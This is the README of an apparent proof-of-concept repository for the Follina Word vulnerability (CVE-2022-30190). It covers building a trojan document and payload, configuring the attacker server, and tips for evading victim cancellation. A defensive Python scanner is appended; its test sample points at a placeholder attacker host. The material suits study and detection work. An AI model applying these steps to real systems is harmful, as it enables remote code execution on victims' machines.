winstxnhdw/CVE-2022-30190


CVE-2022-30190 (Follina)

A proof of concept (PoC) for CVE-2022-30190 (Follina).

Requirements

Victim

  • Windows 10 21H1 (equivalent/earlier)
  • Security update KB5016616 uninstalled

Attacker

Configuration

Edit config.xml to modify the attacker's server hostname and port number.

<host>
  <name>{ hostname }</name>
  <port>{ port }</port>
</host>

Usage

Trojan

The following Python script will build the trojan.docx file and initialise the attacker's server.

python init.py

Payload

Build the payload and remove all unnecessary binaries with the following.

dotnet publish LocalEXF

Clean

Run the following batch script to permanently delete this directory and everything in it.

.\destroy_all.bat

Important Notes

  • To execute complex PowerShell commands, such as the one this PoC runs, the command must be Base64 encoded.

  • index.html must contain at least 4096 bytes of data within the <script> tag.

  • All arguments must be used as described within href.txt.

  • Microsoft Word cannot use the index.html file to execute JavaScript. But for whatever reason, location.href works.

  • For commands that invoke long running tasks, a troubleshooter will appear when the victim loads the document. The victim can inadvertently deny the attack by cancelling the troubleshooter. Ensure that the command runtime is short.
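The defensive counterpart to the trojan.docx that init.py builds and to the index.html / location.href notes above, added here as an example and not part of this repository: CVE-2022-30190 documents reach the attacker's HTML through an externally-targeted oleObject relationship in word/_rels/document.xml.rels, so a scanner can flag any .docx whose OLE object is fetched from a remote URL (or that names the ms-msdt: handler directly). The two sample documents are constructed in memory; the hostname attacker.example is a placeholder.

```python
import io
import zipfile
import xml.etree.ElementTree as ET

REL_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
OLE_REL = "http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject"
# Schemes that should never appear on an oleObject relationship in a benign document.
REMOTE_SCHEMES = ("http", "https", "ms-msdt")

def external_ole_targets(docx_bytes):
    """Return (rels_part, target, scheme) for every oleObject relationship
    whose TargetMode is External, across all word/_rels/*.rels parts."""
    found = []
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as zf:
        for name in zf.namelist():
            if not (name.startswith("word/_rels/") and name.endswith(".rels")):
                continue
            root = ET.fromstring(zf.read(name))
            for rel in root.iter(f"{{{REL_NS}}}Relationship"):
                if rel.get("Type") == OLE_REL and rel.get("TargetMode") == "External":
                    target = rel.get("Target", "")
                    scheme = target.split(":", 1)[0].lower() if ":" in target else ""
                    found.append((name, target, scheme))
    return found

def is_suspicious(docx_bytes):
    """True when an embedded OLE object is loaded from a remote URL or the
    ms-msdt: handler, the loader pattern used by Follina documents."""
    return any(s in REMOTE_SCHEMES for _, _, s in external_ole_targets(docx_bytes))

def build_sample(rels_xml):
    """Constructed minimal .docx-like zip holding only the relationships part."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("word/_rels/document.xml.rels", rels_xml)
    return buf.getvalue()

# Constructed sample mimicking the public Follina layout (trailing "!" on the URL).
MALICIOUS = build_sample(
    f'<Relationships xmlns="{REL_NS}"><Relationship Id="rId9" Type="{OLE_REL}" '
    'Target="http://attacker.example:8000/index.html!" TargetMode="External"/></Relationships>')
# Constructed benign document: the OLE object is embedded inside the package.
BENIGN = build_sample(
    f'<Relationships xmlns="{REL_NS}"><Relationship Id="rId1" Type="{OLE_REL}" '
    'Target="embeddings/oleObject1.bin"/></Relationships>')

if __name__ == "__main__":
    for label, doc in (("malicious", MALICIOUS), ("benign", BENIGN)):
        print(label, is_suspicious(doc), external_ole_targets(doc))
```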